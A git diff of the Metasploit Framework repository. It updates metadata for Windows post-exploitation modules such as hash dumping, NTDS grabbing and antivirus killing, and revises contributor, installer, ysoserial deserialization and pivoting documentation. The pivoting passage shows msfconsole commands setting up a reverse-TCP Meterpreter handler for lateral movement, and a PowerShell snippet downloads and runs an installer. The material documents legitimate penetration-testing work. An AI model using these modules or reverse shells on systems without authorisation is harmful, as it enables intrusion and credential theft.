+    "description": "This module will enumerate current and recently logged on Windows users.",
    "references": [

    ],
@@ -208668,7 +213974,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2022-08-08 01:50:36 +0000",
    "path": "/modules/post/windows/gather/enum_logged_on_users.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_logged_on_users",
@@ -208676,8 +213982,19 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
+      "powershell",
+      "shell",
      "meterpreter"
    ],
    "needs_cleanup": null
@@ -208694,7 +214011,7 @@
    "author": [
      "Brandon Perry <bperry.volatile@gmail.com>"
    ],
-    "description": "This module will enumerate the OS license key",
+    "description": "This module will enumerate Microsoft product license keys.",
    "references": [

    ],
@@ -208704,7 +214021,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-02-24 16:06:55 +0000",
+    "mod_time": "2022-08-21 16:00:27 +0000",
    "path": "/modules/post/windows/gather/enum_ms_product_keys.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_ms_product_keys",
@@ -208712,9 +214029,20 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
-      "meterpreter"
+      "meterpreter",
+      "powershell",
+      "shell"
    ],
    "needs_cleanup": null
  },
@@ -208828,7 +214156,7 @@
    "needs_cleanup": null
  },
  "post_windows/gather/enum_powershell_env": {
-    "name": "Windows Gather Powershell Environment Setting Enumeration",
+    "name": "Windows Gather PowerShell Environment Setting Enumeration",
    "fullname": "post/windows/gather/enum_powershell_env",
    "aliases": [

@@ -208839,9 +214167,10 @@
    "author": [
      "Carlos Perez <carlos_perez@darkoperator.com>"
    ],
-    "description": "This module will enumerate Microsoft Powershell settings",
+    "description": "This module will enumerate Microsoft PowerShell settings.",
    "references": [
-
+      "URL-https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies",
+      "URL-https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles"
    ],
    "platform": "Windows",
    "arch": "",
@@ -208849,7 +214178,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-08-01 00:56:21 +0000",
    "path": "/modules/post/windows/gather/enum_powershell_env.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_powershell_env",
@@ -208857,9 +214186,20 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
-      "meterpreter"
+      "meterpreter",
+      "shell",
+      "powershell"
    ],
    "needs_cleanup": null
  },
@@ -208984,7 +214324,7 @@
      "Keith Faber",
      "Kx499"
    ],
-    "description": "This module will query the system for services and display name and\n        configuration info for each returned service. It allows you to\n        optionally search the credentials, path, or start type for a string\n        and only return the results that match. These query operations are\n        cumulative and if no query strings are specified, it just returns all\n        services.  NOTE: If the script hangs, windows firewall is most likely\n        on and you did not migrate to a safe process (explorer.exe for\n        example).",
+    "description": "This module will query the system for services and display name and\n          configuration info for each returned service. It allows you to\n          optionally search the credentials, path, or start type for a string\n          and only return the results that match. These query operations are\n          cumulative and if no query strings are specified, it just returns all\n          services.  NOTE: If the script hangs, windows firewall is most likely\n          on and you did not migrate to a safe process (explorer.exe for\n          example).",
    "references": [

    ],
@@ -208994,7 +214334,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2022-09-09 17:27:19 +0000",
    "path": "/modules/post/windows/gather/enum_services.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_services",
@@ -209002,9 +214342,20 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
-      "meterpreter"
+      "meterpreter",
+      "powershell",
+      "shell"
    ],
    "needs_cleanup": null
  },
@@ -209020,7 +214371,7 @@
    "author": [
      "Carlos Perez <carlos_perez@darkoperator.com>"
    ],
-    "description": "This module will enumerate configured and recently used file shares",
+    "description": "This module will enumerate configured and recently used file shares.",
    "references": [

    ],
@@ -209030,7 +214381,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-08-31 12:31:09 +0000",
    "path": "/modules/post/windows/gather/enum_shares.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_shares",
@@ -209038,14 +214389,25 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
+      "shell",
+      "powershell",
      "meterpreter"
    ],
    "needs_cleanup": null
  },
  "post_windows/gather/enum_snmp": {
-    "name": "Windows Gather SNMP Settings Enumeration (Registry)",
+    "name": "Windows Gather SNMP Settings",
    "fullname": "post/windows/gather/enum_snmp",
    "aliases": [

@@ -209057,9 +214419,10 @@
      "Carlos Perez <carlos_perez@darkoperator.com>",
      "Tebo <tebo@attackresearch.com>"
    ],
-    "description": "This module will enumerate the SNMP service configuration",
+    "description": "This module will enumerate the SNMP service configuration.",
    "references": [
-
+      "MSB-MS00-096",
+      "URL-https://docs.microsoft.com/en-us/security-updates/securitybulletins/2000/ms00-096"
    ],
    "platform": "Windows",
    "arch": "",
@@ -209067,7 +214430,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2022-09-13 17:45:10 +0000",
    "path": "/modules/post/windows/gather/enum_snmp.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_snmp",
@@ -209075,8 +214438,19 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
+      "shell",
+      "powershell",
      "meterpreter"
    ],
    "needs_cleanup": null
@@ -209797,7 +215171,7 @@
    "author": [
      "smashery"
    ],
-    "description": "This module creates a memory dump of a process (to disk) and downloads the file\n          for offline analysis.\n          Options for DUMP_TYPE affect the completeness of the dump. \"full\" retrieves\n          the entire process address space (all allocated pages).\n          \"standard\" excludes image files (e.g. DLLs and EXEs in the address space) as\n          well as memory mapped files. As a result, this option can be significantly\n          smaller in size.",
+    "description": "This module creates a memory dump of a process (to disk) and downloads the file\n          for offline analysis.\n\n          Options for DUMP_TYPE affect the completeness of the dump:\n\n          \"full\" retrieves the entire process address space (all allocated pages);\n          \"standard\" excludes image files (e.g. DLLs and EXEs in the address space) as\n          well as memory mapped files. As a result, this option can be significantly\n          smaller in size.",
    "references": [

    ],
@@ -209807,7 +215181,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-08-24 18:04:29 +0000",
    "path": "/modules/post/windows/gather/memory_dump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/memory_dump",
@@ -209925,7 +215299,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-09-08 21:56:02 +0000",
+    "mod_time": "2022-08-20 12:16:26 +0000",
    "path": "/modules/post/windows/gather/ntds_grabber.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/ntds_grabber",
@@ -209961,7 +215335,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-08-20 12:16:26 +0000",
    "path": "/modules/post/windows/gather/ntds_location.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/ntds_location",
@@ -210184,7 +215558,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-07-25 14:51:37 +0000",
    "path": "/modules/post/windows/gather/screen_spy.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/screen_spy",
@@ -210220,7 +215594,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-08-20 12:16:26 +0000",
    "path": "/modules/post/windows/gather/smart_hashdump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/smart_hashdump",
@@ -210889,7 +216263,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-08-08 12:56:52 +0000",
    "path": "/modules/post/windows/manage/forward_pageant.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/forward_pageant",
@@ -210897,6 +216271,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
      "meterpreter"
@@ -211148,7 +216531,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-09-07 14:01:53 +0000",
    "path": "/modules/post/windows/manage/killav.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/killav",
@@ -211156,9 +216539,20 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "os-resource-loss"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
-      "meterpreter"
+      "meterpreter",
+      "powershell",
+      "shell"
    ],
    "needs_cleanup": null
  },
@@ -211485,7 +216879,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-08-08 18:00:36 +0000",
    "path": "/modules/post/windows/manage/powershell/exec_powershell.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/powershell/exec_powershell",
@@ -211512,7 +216906,7 @@
      "Ben Turner benpturner <Ben Turner benpturner@yahoo.com>",
      "Dave Hardy davehardy20 <Dave Hardy davehardy20@gmail.com>"
    ],
-    "description": "This module will download and execute one or more PowerShell script\n        s over a present powershell session.\n        Setting VERBOSE to true will show the stager results.",
+    "description": "This module will download and execute one or more PowerShell scripts\n        over a present powershell session.\n        Setting VERBOSE to true will show the stager results.",
    "references": [

    ],
@@ -211522,7 +216916,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2022-08-08 18:00:36 +0000",
    "path": "/modules/post/windows/manage/powershell/load_script.rb",
    "is_install_path": true,
    "ref_name": "windows/manage/powershell/load_script",
@@ -6,6 +6,9 @@ However, tackling core Metasploit Framework bugs or particularly squirrelly expl

 Metasploit is a tool by and for hackers, but the hackers that maintain it also happen to be software engineers. So, we have some hopefully easy-to-remember Do's and Don'ts in [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md). Read up on those.

+# Making Your First PR
+Our preferred method of module submission is via a git pull request from a feature branch on your own fork of Metasploit. You can learn more about making your first PR at [[Creating Your First PR]]
+
 # Server exploits

 Server exploits are always in demand; why bother with complicated social engineering campaigns when you can go straight to the pain point of a vulnerable network. Here are some search queries to get you started:
@@ -53,9 +56,6 @@ Again, there's always room on #metasploit on Freenode. Be helpful with the quest

 You probably shouldn't run proof of concept exploit code you find on the Internet on a machine you care about in a network you care about. That is generally considered a Bad Idea. You also probably shouldn't use your usual computer as a target for exploit development, since you are intentionally inducing unstable behavior.

-Our preferred method of module submission is via a git pull request from a feature branch on your own fork of Metasploit.  You can learn how to create one here:
-[[Landing-Pull-Requests]]
-
 Also, please take a peek at our guides on using git and our acceptance guidelines for new modules in case you're not familiar with them.

 If you get stuck, try to explain your specific problem as best you can on our [Freenode IRC](https://freenode.net/) channel, #metasploit (joining requires a [registered nick](https://freenode.net/kb/answer/registration)). Someone should be able to lend a hand. Apparently, some of those people never sleep.
@@ -0,0 +1,136 @@
+# Creating Your First PR - An Intro To Git and the PR Process
+## Intro
+Congratulations fellow traveler, so you're interested in contributing to Metasploit eh? Well welcome aboard, its going to be a fun ride!
+You'll learn lots along the way but here are some tips and tricks that should help you get started with making your first PR request
+whilst also avoiding some common pitfalls and learning how some of our systems work.
+
+## Initial Steps and Important Notes
+The rest of this guide assumes you have already followed the steps at [Setting Up A Developer Environment](https://r-7.co/MSF-DEV) in order to get
+a fork of Metasploit set up and ready to run, and that you have added in your SSH keys 
+(see [Adding a New SSH Key To Your GitHub Account](https://docs.github.com/en/authentication/connecting-to-github-with-ssh/adding-a-new-ssh-key-to-your-github-account)), 
+set up Ruby and optionally the PostgreSQL database, and done any custom shortcuts you wish to configure.
+
+## Getting the Latest Version of Metasploit Framework
+Before making any new contributions, you will want to sure you are running the latest version of Metasploit Framework.
+To do this run `git checkout master && git fetch upstream && git pull`, where `upstream` is the branch connected to the 
+Rapid7 remote, aka Rapid7's copy of the code. You can verify that `upstream` is set correctly by running `git remote get-url upstream`
+and verifying it is set to `git@github.com:rapid7/metasploit-framework.git`.
+
+Once you run this command, it will check out the `master` branch, then fetch all
+the changes from `upstream` (which should be configured to be Rapid7's copy of Metasploit Framework on GitHub). Once
+it has cached these changes, the `git pull` command will then pull these changes into the current branch, aka `master`.
+
+Not pulling down changes before writing new code could lead to big issues down the line, particularly if someone has edited a file
+you intended to modify. In that case maintainers will then have to try find the right combination of changes to implement, which could lead
+to your PR being rejected if these changes are too complex.
+
+## Making Sure Your Gems Are Updated
+The next step is to make sure you have the latest copy of the Gems that Metasploit Framework depends on. This can be done by running `bundle install`
+from the same directory as where the `Gemfile.lock` file is located, which will be in the same folder as wherever you cloned your fork to locally.
+
+Doing this will allow you to make sure that you are running the latest libraries, which will ensure if you do encounter any bugs whilst
+developing code, those bugs are not related to out of date Gems being installed, and are therefore potentially legitimate bugs that need fixing.
+
+## Creating a New Branch for Your Code
+Once all of this is done, you will want to create a new branch for your code, which can be done by running `git checkout -b <your branch name here>`.
+This will snapshot the current branch that you are on, and use that to create a new branch with the name provided. Note that I did say snapshot. This is
+why it's important to update the current branch's code to the latest version of Metasploit Framework available prior to running this command,
+otherwise the new branch will contain outdated code.
+
+## Adding in Your Changes and Creating Meaningful Commit Messages
+Once you have made your code changes, add them using `git add <path to file to add> <optional path to second file to add>`. Note that you can
+specify multiple files to add using `git add` at the same time.
+
+To commit these changes locally, use `git commit -m "<commit message here>"`. Note that as a general rule of thumb, commit messages should aim
+to be 50 characters or less while telling readers what was changed in that commit. You generally don't want to create commits that do multiple things at once,
+instead create a separate commit for each group of items that you are changing, and make sure that the commit message reflects what changed in a general sense.
+
+Note also that maintainers may end up squashing your commits down so that your commit A, B, and C, now become commit D which
+contains all of the same changes as commit A, B, and C, but in one commit and with one associated commit message. This is often
+done when the code is ready to be landed into Metasploit Framework to help make the commit history easier for people to read.
+
+## Checking for Code Errors
+Before code can be accepted into Metasploit Framework, it must also pass our RuboCop and MsfTidy rules. These help ensure that
+all contributors are committing code that follows a common set of standards. To check if your code meets our RuboCop standards, 
+from the root of wherever you cloned your fork of Metasploit Framework to on disk, run `rubocop <path to your module from current directory>`.
+
+Specifying the `-a` parameter will ask RuboCop to check your module and if possible fix any issues that RuboCop is able to fix.
+In this case the command would be `rubocop -a <path to your module from current directory>`. It is encouraged to keep running 
+this command and fixing any issues that come up until RuboCop no longer comes back with any errors to report. Once this is 
+complete, run `git add <file>` followed by `git commit -m "RuboCop Fixes"`. You can change the commit message if you 
+want, but it should mention RuboCop as it helps maintainers know what the commit is related to.
+
+As a good practice rule, you should always separate your commits that contain RuboCop changes from those that contain non-RuboCop related changes.
+This helps ensure that when it comes time to review your code, review can proceed a lot quicker and more efficiently.
+
+Note that special cases exist if you are writing library code as our RuboCop rules are primarily designed to be run against modules.
+If at any point you are confused r.e this, please feel free to reach out and ask us for help on Slack at https://metasploit.com/slack.
+
+Once this is done, the next tool to run is located in the root of the Metasploit local fork at `tools/dev/msftidy.rb`. You will want to run this tool
+against your module code (if applicable), using `tools/dev/msftidy.rb <path to module>`. This will give some output if there are any errors, or no output
+if your module passed the tests. Try and fix any errors mentioned here.
+
+## Writing Documentation
+The next step to do, if you are writing a module, is to write the documentation for the module. You can find some information 
+on how to write module documentation at [Writing Module Documentation](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html).
+
+In general when writing documentation you will want to search for a similar documentation file under the `documentation`
+folder located in the root of the Metasploit fork. You can then copy one of these files and use it as the basis for writing
+your new documentation for your module.
+
+When writing the information for the documentation, be sure to make sure your installation steps are as clear as possible. Any confusion over
+how to set up the target to be exploited will likely result in delays. You will want to put as much detail here as possible.
+
+Additionally any information about caveats, scenarios you have tested, custom options you added in, or quirks you noticed
+should also go into this file.
+
+## Checking Documentation Syntax
+Once you have written the documentation, you then want to run `toos/dev/msftidy_docs.rb <path to documentation file>`. This will report on any
+errors with your documentation file, which you will want to fix before submitting your PR. Notice however that if you get a warning about long lines,
+these may be okay to ignore depending on the context. A good example is if a line is long merely because of a URL. Such warnings can be
+safely ignored.
+
+## Submitting Your Changes and Opening a PR
+Once you have gone through all of the steps above you should be ready to submit your PR. To submit your PR, first check which 
+branch points to your copy of the code. If you have followed the setup guide, it should be `origin`. You can double check this 
+branch's remote URL using `git remote get-url origin`. It should look something like `git@github.com:gwillcox-r7/metasploit-framework`
+with `gwillcox-r7` substituted for your username.
+
+Assuming the `origin` branch is in fact pointing to your copy of the code, run `git push origin local-branch:remote-branch` 
+and replace `local-branch` with the branch locally where your code changes are located, and `remote-branch` with what 
+you want this branch to be called on the remote repository, aka `origin` which will be your fork on GitHub.com. In most 
+cases you will want these two names to be the same to avoid confusion, but its good to know this syntax should you 
+start working with more complex situations. Note that if the branch pointing to your copy of the code is not named `origin`,
+replace the word `origin` in the command above with the name of the branch that does point to your copy of the code.
+
+This should result in output similar to the following:
+
+```
+> git push origin update_mssql_lib_parameters:update_mssql_lib_parameters
+Enumerating objects: 15, done.
+Counting objects: 100% (15/15), done.
+Delta compression using up to 2 threads
+Compressing objects: 100% (8/8), done.
+Writing objects: 100% (8/8), 1.55 KiB | 1.55 MiB/s, done.
+Total 8 (delta 7), reused 0 (delta 0), pack-reused 0
+remote: Resolving deltas: 100% (7/7), completed with 7 local objects.
+remote: 
+remote: Create a pull request for 'update_mssql_lib_parameters' on GitHub by visiting:
+remote:      https://github.com/gwillcox-r7/metasploit-framework/pull/new/update_mssql_lib_parameters
+remote: 
+To github.com:gwillcox-r7/metasploit-framework
+ * [new branch]            update_mssql_lib_parameters -> update_mssql_lib_parameters
+```
+
+To create a new pull request (aka PR), browse to the URL mentioned in this output. In this case for the output above this would
+be `https://github.com/gwillcox-r7/metasploit-framework/pull/new/update_mssql_lib_parameters`.
+
+This will open a new template to create a PR request. Please follow all of the directions here and provide the requested details whilst also
+deleting the template text once you have provided the requested information. Note that PRs that do not provide anything but the template text for
+their description will be closed.
+
+In your PR description you should take care to mention what it is that you are submitting, details on the type of vulnerability and CVE-ID,
+if applicable, how to test the submission, as well as any special concerns or items of note that occurred whilst conducting testing.
+
+Once this is done a member of our team will review your PR within a few days and provide feedback on any changes that may still need to be made
+before the submission can be accepted.
@@ -12,8 +12,10 @@ The pgp signatures below can be verified with the following [public key](https:/

 |Download Link|File Type|SHA1|PGP|
 |-|-|-|-|
-| [metasploit-4.21.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
-| [metasploit-4.21.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)|
+| [metasploit-4.21.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
+| [metasploit-4.21.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)|
+| [metasploit-4.21.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.asc)|
+| [metasploit-4.21.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.asc)|
 | [metasploit-4.20.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.asc)|
 | [metasploit-4.20.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run.asc)|
 | [metasploit-4.19.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe.asc)|
@@ -29,7 +29,7 @@ Once the serialized object is generated and stored as `java_payload`, it's then
 ### `#generate_java_deserialization_for_payload(name, payload)`
 This method will generate a serialized Java object that when loaded will execute the specified Metasploit payload. The payload will be converted to an operating system command using one of the supported techniques contained within this method and then passed to [`#generate_java_deserialization_for_command`](#generate_java_deserialization_for_commandname-shell-command).
 
- **name** - The payload name parameter must be one of the supported payloads stored in the `ysoserial` cache.  As of this writing, the list includes: `BeanShelll1`, `Clogure`, `CommonBeanutils1`, `CommonsCollections2`, `CommonsCollections3`, `CommonsCollections4`, `CommonsCollections5`, `CommonsCollections6`, `Groovy1`, `Hibernate1`, `JBossInterceptors1`, `JRMPClient`, `JSON1`, `JavassistWeld1`, `Jdk7u21`, `MozillaRhino1`, `Myfaces1`, `ROME`, `Spring1`, `Spring2`, and `Vaadin1`.  While `ysoserial` includes additional payloads that are not listed above, they are unsupported by the library due to the need for complex inputs.  Should there be use cases for additional payloads, please consider opening an issue and submitting a pull request to add support.
+- **name** - The payload name parameter must be one of the supported payloads stored in the `ysoserial` cache.  As of this writing, the list includes: `BeanShelll1`, `Clogure`, `CommonsBeanutils1`, `CommonsCollections2`, `CommonsCollections3`, `CommonsCollections4`, `CommonsCollections5`, `CommonsCollections6`, `Groovy1`, `Hibernate1`, `JBossInterceptors1`, `JRMPClient`, `JSON1`, `JavassistWeld1`, `Jdk7u21`, `MozillaRhino1`, `Myfaces1`, `ROME`, `Spring1`, `Spring2`, and `Vaadin1`.  While `ysoserial` includes additional payloads that are not listed above, they are unsupported by the library due to the need for complex inputs.  Should there be use cases for additional payloads, please consider opening an issue and submitting a pull request to add support.
 
 - **payload** - The payload object to execute on the remote system. This is the native Metasploit payload object and it will be automatically converted to an operating system command using a technique suitable for the target platform and architecture. For example, x86 Windows payloads will be converted using a Powershell command. Not all platforms and architecture combinations are supported. Unsupported combinations will result in a `RuntimeError` being raised which will need to be handled by the module developer.

@@ -169,4 +169,4 @@ DONE!  Successfully generated 0 static payloads and 22 dynamic payloads.  Skippe
 At completion, the `data/ysoserial_payloads.json` file is overwritten and the 22 dynamic payloads are ready for use within the framework.  Afterward, the developer should follow the standard `git` procedures to `add` and `commit` the new JSON file  before generating a pull request and landing the updated JSON into the framework's `master` branch.

 [1]: https://github.com/pimps/ysoserial-modified/blob/e71f70dbc5e8c27d72873014ac5cb7766f4b5b94/src/main/java/ysoserial/payloads/util/CmdExecuteHelper.java#L11-L30
-[2]: https://github.com/rapid7/metasploit-framework/blob/d580e7d12218fbf62b190a0c0c6d25f43b8aa5be/modules/exploits/multi/http/shiro_rememberme_v124_deserialize.rb
+[2]: https://github.com/rapid7/metasploit-framework/blob/d580e7d12218fbf62b190a0c0c6d25f43b8aa5be/modules/exploits/multi/http/shiro_rememberme_v124_deserialize.rb
@@ -30,6 +30,33 @@ Download the [latest Windows installer](https://windows.metasploit.com/metasploi

 If you downloaded Metasploit from us, there is no cause for alarm.  We pride ourselves on offering the ability for our customers and followers to have the same toolset that the hackers have so that they can test systems more accurately.  Because these (and the other exploits and tools in Metasploit) are identical or very similar to existing malicious toolsets, they can be used for nefarious purposes, and they are often flagged and automatically removed by antivirus programs, just like the malware they mimic.

+### Windows silent installation
+
+The PowerShell below will download and install the framework, and is suitable for automated Windows deployments. Note that, the installer will be downloaded to `$DownloadLocation` and won't be deleted after the script has run.
+```
+[CmdletBinding()]
+Param(
+    $DownloadURL = "https://windows.metasploit.com/metasploitframework-latest.msi",
+    $DownloadLocation = "$env:APPDATA/Metasploit",
+    $InstallLocation = "C:\Tools",
+    $LogLocation = "$DownloadLocation/install.log"
+)
+
+If(! (Test-Path $DownloadLocation) ){
+    New-Item -Path $DownloadLocation -ItemType Directory
+}
+
+If(! (Test-Path $InstallLocation) ){
+    New-Item -Path $InstallLocation -ItemType Directory
+}
+
+$Installer = "$DownloadLocation/metasploit.msi"
+
+Invoke-WebRequest -UseBasicParsing -Uri $DownloadURL -OutFile $Installer
+
+& $Installer /q /log $LogLocation INSTALLLOCATION="$InstallLocation"
+```
+
 ## Improving these installers

 Feel free to review and help improve [the source code for our installers](https://github.com/rapid7/metasploit-omnibus).
@@ -1,4 +1,5 @@
-# Overview of Pivoting And Its Benefits
+## Overview
+
 Whilst in test environments one is often looking at flat networks that only have one subnet and one network environment, the reality is that when it comes to pentests that are attempting to compromise an entire company, you will often have to deal with multiple networks, often with switches or firewalls in-between that are intended to keep these networks separate from one another.

 In order for pivoting to work, you must have compromised a host that is connected to two or more networks. This usually means that the host has two or more network adapters, whether that be physical network adapters, virtual network adapters, or a combination of both.
@@ -7,11 +8,14 @@ Once you have compromised a host that has multiple network adapters you can then

 Now that we understand some of the background, lets see this in action a bit more by setting up a sample environment and walking through some of Metasploit's pivoting features.

-# A Quick Note Before Continuing
+## Supported Session Types
+
 Pivoting functionality is provided by all Meterpreter and SSH sessions that occur over TCP channels. Whilst Meterpreter is mentioned below, keep in mind that this would also work with an SSH session as well. We have just resorted to using Meterpreter for this example for demonstration purposes.

-# Testing Pivoting
-## Target Environment Setup
+## Testing Pivoting
+
+### Target Environment Setup
+
 - Kali Machine
 	- Internal: None
 	- External: 172.19.182.171
@@ -153,7 +157,7 @@ IPv4 Active Routing Table
 msf6 post(multi/manage/autoroute) >
 ```

-# Using the Pivot
+## Using the Pivot
 At this point we can now use the pivot with any Metasploit modules as shown below:

 ```
@@ -210,11 +214,80 @@ msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce)
 [*] 169.254.204.110:443 - The target is not exploitable. Exchange Server 15.2.986.14 does not appear to be a vulnerable version!
 msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) >
 ```
-# Pivoting External Tools
-## portfwd
+
+## SMB Named Pipe Pivoting in Meterpreter
+
+The Windows Meterpreter payload supports lateral movement in a network through SMB Named Pipe Pivoting. No other Meterpreters/session types support this functionality.
+
+First open a Windows Meterpreter session to the pivot machine:
+
+```
+msf6 > use payload/windows/x64/meterpreter/reverse_tcp
+smsf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 172.19.182.171
+lhost => 172.19.182.171
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > set lport 4578
+lport => 4578
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler
+[*] Payload Handler Started as Job 0
+
+[*] Started reverse TCP handler on 172.19.182.171:4578 
